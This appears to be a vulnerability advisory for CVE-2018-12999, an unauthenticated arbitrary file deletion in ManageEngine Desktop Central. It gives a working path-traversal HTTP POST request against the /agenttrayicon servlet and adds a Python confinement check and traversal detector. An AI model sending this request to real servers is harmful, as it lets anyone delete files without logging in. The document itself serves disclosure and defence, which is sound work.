1. Choose a useless file for the test, e.g. /images/demo/loginas_bottom.gif
2. Send the payload below:

```http
POST /agenttrayicon HTTP/1.1
Host: 192.168.1.203:8020
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 129

screenShotAttached=yes&video_type=2&customerId=1&computerName=../../../&resourceId=xxx&filename=../images/demo/loginas_bottom.gif
```

3. Visit the file again; it has been deleted.

Notice: it can be successfully reproduced without login info.
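Added here as an example, not code from the report or from ManageEngine: a Python version of the two checks a defender would want around this servlet, the path-confinement test that would have refused the deletion and a detection helper that flags traversal in logged request bodies. The base directory and the sample bodies are constructed; the parameter names come from the request above.

```python
"""Added example: confine a computerName/filename pair to a base directory, and
flag traversal in logged /agenttrayicon form bodies.  BASE_DIR and the sample
bodies are constructed for illustration."""
from pathlib import Path
from urllib.parse import parse_qs

# Constructed: where the screenshot/video files are expected to live.
BASE_DIR = Path("/opt/desktopcentral/webapps/DesktopCentral/screenshots").resolve()


def confine_to_base(base: Path, computer_name: str, filename: str):
    """Return the resolved target path only if it stays inside `base`.

    This is the hardened form of the lookup: join the untrusted parts, resolve
    '..' and symlinks, then require the result to be a descendant of `base`.
    Returns None for anything that escapes (e.g. computerName='../../../').
    """
    candidate = (base / computer_name / filename).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


# Parameters the servlet turns into path components (from the PoC request).
TRAVERSAL_PARAMS = ("computerName", "filename", "resourceId", "customerId")


def flag_traversal(body: str) -> list:
    """Detection helper: given a logged x-www-form-urlencoded body, return the
    parameters whose URL-decoded value contains '..' or is an absolute path."""
    params = parse_qs(body, keep_blank_values=True)
    hits = []
    for name in TRAVERSAL_PARAMS:
        for value in params.get(name, []):
            if ".." in value or value.startswith(("/", "\\")):
                hits.append(name)
    return hits


# Constructed samples: the PoC body from the report and a benign request.
POC_BODY = ("screenShotAttached=yes&video_type=2&customerId=1&computerName=../../../"
            "&resourceId=xxx&filename=../images/demo/loginas_bottom.gif")
BENIGN_BODY = ("screenShotAttached=yes&video_type=2&customerId=1&computerName=WS01"
               "&resourceId=1001&filename=1001.png")

if __name__ == "__main__":
    print(flag_traversal(POC_BODY))  # ['computerName', 'filename']
    print(confine_to_base(BASE_DIR, "../../../", "../images/demo/loginas_bottom.gif"))  # None
```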
unh3x changed the title from "Zoho manageengine Desktop Central Arbitrary File Deletion" to "[CVE-2018-12999] Zoho manageengine Desktop Central Arbitrary File Deletion" on Jun 29, 2018
=================
Zoho manageengine Desktop Central Arbitrary File Deletion
Date: 2018/06/20
Software Link: https://www.manageengine.com/products/desktop-central/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
CVE: CVE-2018-12999
=================
Vulnerable cgi
com.adventnet.sym.webclient.statusupdate.AgentTrayIconServlet
=================
Proof of Concept: see the steps above.